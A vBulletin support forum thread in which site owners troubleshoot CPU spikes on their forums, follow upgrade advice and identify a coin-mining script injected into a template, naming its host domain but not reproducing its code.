VB 4.2.3 infected by cryptomining malware

**Mark.B** · Sat 31 Mar '18, 5:49am

That's rather a big assumption to make. You visit your forum, the CPU load goes up, so obviously it must be crypto mining software? What evidence do you have that this is the specific cause?

Regardless of that, there are no known security exploits in 4.2.3, so if you HAVE been compromied, it's either through an add on, or the server, or someone's obtained a password.

What are the results of a suspect file check under diagnostics in the AdminCP?

"Failed to upgrade" also doesn't tell us anything. We need full details of what you did, and what error messages were received. However, upgrading isn't a magic fix for hacked sites so this isn't really essential at this point.

**popup** · Sat 31 Mar '18, 7:02am

I made that assumption lacking any other viable explanation, and regarding that some ads that I've used previously on the forum, had made the very same high cpu behavior on my other site (not forum).

It seems that my VB version is 4.2.2 please modify the thread's titile.

diagnostic gives a lot of :

File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4

Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.

**Mark.B** · Sat 31 Mar '18, 8:02am

Originally posted by popup

I made that assumption lacking any other viable explanation, and regarding that some ads that I've used previously on the forum, had made the very same high cpu behavior on my other site (not forum).

It seems that my VB version is 4.2.2 please modify the thread's titile.

diagnostic gives a lot of :

File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4

Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.

Ok, the first thing I would do is upgrade to 4.2.3 (no higher at this stage).

BEGIN BY TAKING A FULL BACKUP OF THE DATABASE.

Download a full copy of the 4.2.3 files from the members area, under 'Download vBulletin....' under the license options column on the right. It's important to obtain the full 4.2.3 package, not the patch release, and make sure it's for the correct license.

Unzip and upload ALL the files, then run domain.com/install/upgrade.php.

**popup** · Sat 31 Mar '18, 11:10am

I tried to upgrade to 4.2.3 but the upgrade freezed at %26.

However at the the admincp now I see:

(vBulletin 4.2.3 Patch Level 2)

So not sure whether the upgrade was successful.

At any rate, I still have that nasty high cpu load while the plugins are disabled.

It happens only when I open the forum, not the admin panel.

What do you suggest Mark as the next step?

**Mark.B** · Sat 31 Mar '18, 2:03pm

You need to complete the upgrade. If the page has stalled, refresh the page and it should carry on.

**popup** · Sat 31 Mar '18, 5:59pm

I‌ managed to upgrade to 4.2.5 Beta 1 after a lot of refresh, while at several settings I‌ had to choose merge templates to 'No' in order to make it to proceed to upgrade. it is hanged at step 7 of 17 to reach 4.2.5 however.

I still have that high cpu load. Where should I‌ look for the nefarious code/script?

**Mark.B** · Sat 31 Mar '18, 11:19pm

I did say to upgrade to 4.2.3 and no higher at this stage. Why have you attempted to upgrade to 4.2.5?

it is important to follow our instructions closely and precisely. If you don’t do this, we cannot help.

If it is stuck at step 17 your upgrade is NOT complete and your site will be broken. No upgrade is complete until you get the completed message at the end.

What php version are you running on the server?

**popup** · Sun 1 Apr '18, 2:23am

I‌ have successfully upgraded to 4.2.3. But still get that high cpu load.
My php version is 5.6.30.
What can I‌do now?
Also, I'm wondering if it is not cryptomining malware, what else can cause such high cpu spike on a vBulletin site?‌

**Trevor Hannant** · Mon 2 Apr '18, 1:11am

Are you the only person who's having high PC CPU load when visiting your site or are other users experiencing this?

**Jamsoft** · Thu 5 Apr '18, 1:43pm

I have the same thing happening on a customer's site. I've recommended they upgrade (or allow me to upgrade) to the latest 4.2.5 (they're on 4.2.0) and am awaiting their response. Their users are swearing up and down its the courier3.js file as well as the yui files. When I go to the site, my CPU starts spiking high, and if I sit in developer tools, I see tons of images keep being loaded every so often that are not showing up on the page. So something is up, but I havent yet seen something solid as far as whats causing it.

**Jamsoft** · Thu 5 Apr '18, 2:02pm

Ok, check this out:

This script was loaded at the top of the customer's template. As first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

Trevor, does the above look familiar at all?

**In Omnibus** · Thu 5 Apr '18, 3:43pm

Originally posted by Jamsoft

Ok, check this out:

This script was loaded at the top of the customer's template. As first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

Trevor, does the above look familiar at all?

That is definitely a coin miner.

allfontshere.press - Google Search

https://www.google.com/search?ei=VLTGWoKpNfGg_Qb1mZXgAg&q=allfontshere.press&oq=allfontshere.press&gs_l=psy-ab.3...9390.10444.0.11204.6.6.0.0.0.0.84.474.6.6.0....0...1c.1.64.psy-ab..0.0.0....0.k5JuSLeIMeM

**Jamsoft** · Thu 5 Apr '18, 4:07pm

Nice. Well its disabled. It's not my site, so I'm not sure how it got there. I still think they should let me upgrade the site, and maybe add some security to the admincp.

**Dreslough** · Thu 5 Apr '18, 6:33pm

We're running 4.2.4 and I just discovered the same problem. I even opened up my CPU, assuming I was dealing with a hardware problem after all the Windows diagnostics came back normal. Then I realized that I had a tab open to our company's forum (http://mogulforums.com/) in Chrome. And even after a reboot, Chrome was nice enough to re-open all my tabs. (D'oh!). Then I closed the vBulletin tab and my computer started working normally again (and the CPU usage dropped from 97-99% down to 2-3%).

I'm a vBulletin newbie so I'm still infected. But at least I'm partway to discovering and fixing. I have no plug-ins installed. Could someone please lead me through the steps to find and remove the offending code? (e.g. exactly what do I click on the Admin CP menu etc.)

For example, I don't even know how to search customer templates.

Thanks!

Clay

vBulletin 4 End of Life

VB 4.2.3 infected by cryptomining malware

VB 4.2.3 infected by cryptomining malware

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Related Topics